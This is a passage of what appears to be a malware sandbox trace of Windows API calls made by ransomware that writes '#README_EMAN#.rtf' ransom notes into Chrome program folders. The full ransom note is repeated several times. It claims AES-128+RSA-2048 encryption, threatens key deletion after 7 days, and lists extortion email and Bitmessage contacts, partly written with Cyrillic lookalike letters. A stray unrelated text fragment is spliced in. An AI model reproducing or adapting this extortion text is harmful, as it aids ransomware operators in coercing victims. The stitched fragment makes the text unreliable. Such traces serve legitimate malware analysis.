\\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n is made by offering acÓ\x19", lpUsedDefaultChar=0x0) returned 8717 [0215.179] WriteFile (in: hFile=0x2f0, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0215.179] CloseHandle (hObject=0x2f0) returned 1 [0215.181] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\#readme_eman#.rtf")) returned 0x20 [0215.181] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\#readme_eman#.rtf")) returned 0x20 [0215.181] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\#readme_eman#.rtf")) returned 0x20 [0215.181] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\#readme_eman#.rtf")) returned 0x20 [0215.181] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\#readme_eman#.rtf")) returned 0xffffffff [0215.181] GetLastError () returned 0x2 [0215.181] CreateFileW (lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\SetupMetrics\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\setupmetrics\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0215.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0215.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0215.181] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 